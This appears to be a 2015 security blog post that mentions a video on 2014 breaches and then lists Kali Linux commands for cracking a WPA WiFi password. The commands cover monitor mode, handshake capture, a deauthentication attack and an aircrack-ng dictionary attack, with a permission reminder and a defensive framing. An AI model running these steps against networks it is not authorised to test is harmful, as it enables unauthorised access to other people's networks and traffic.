With January 2015 coming to an end and 2014 seeming like a distant memory in the rear-view mirror, I thought it was a good time to reflect upon some of the notable security incidents and the impact they’ve had (if any) in the long term.
There were many to choose from – which is great from a content perspective, but horribly depressing when you consider what this means for the security trade as a whole. Honourable mentions should also go to JP Morgan, eBay and anything relating to the NSA.
But with this coming in at nearly 7 and a half minutes, I’m not sure how much longer I could have ranted for without losing my voice and sounding like that crazy dude who comes up with all the conspiracy theories.
Cracking wifi passwords with Kali Linux
I haven’t really done a technical walkthrough type video and I now remember why I never did. These things are hard to do and involve two of my least favourite elements of video-making, screen captures and voiceovers. Which is why I always tip my hat to Vivek and his great tutorials over at SecurityTube.net
The idea behind this video was one of those posts on Facebook where a ‘clever’ parent changes the WiFi password and blackmails the child into first doing homework and chores before being able to access the net.
In the video, I kind of glossed over some steps and was a bit quick, so for completeness here are the commands you need once you get Kali up and running and have an injection-capable wireless adapter.
1. airmon-ng (will list all wireless cards)
2. airmon-ng start wlan0 (or whatever your wireless card is – it will start monitor mode mine was mon0)
3. airodump-ng mon0
4. Ctrl+C (once you see the network you want to connect to.
5. Airodump-ng -c [channel] -bssid [bssid] -w /root/Desktop/Catch mon0 (replace channel and bssid accordingly)
6. Open a second terminal window
7. aireplay-ng -0 2 -a [router bssid] -c [client bssid] mon0
8. You should see the message that you’ve captured the handshake so hit Ctrl+C
9. aircrack-ng -a2 -b [router bssid] -w[path to dictionary] /root/Desktop/*.cap
10. That’s it – you should have captured the password, if it’s in the dictionary you downloaded.
Like any security testing, I need not remind you that these kinds of tests should only be done on equipment you own or have permission to test.
Now, in reality, pulling something like this off isn’t very difficult. In under a dozen commands you can potentially grab a wifi password, which is script kiddie territory. The real question goes a lot deeper what can be done with this information? What other information is within the .CAP file? Can this be automated and chained? How can this scenario be run in different ways from an attacker perspective – and also how can you use this knowledge to build better defences?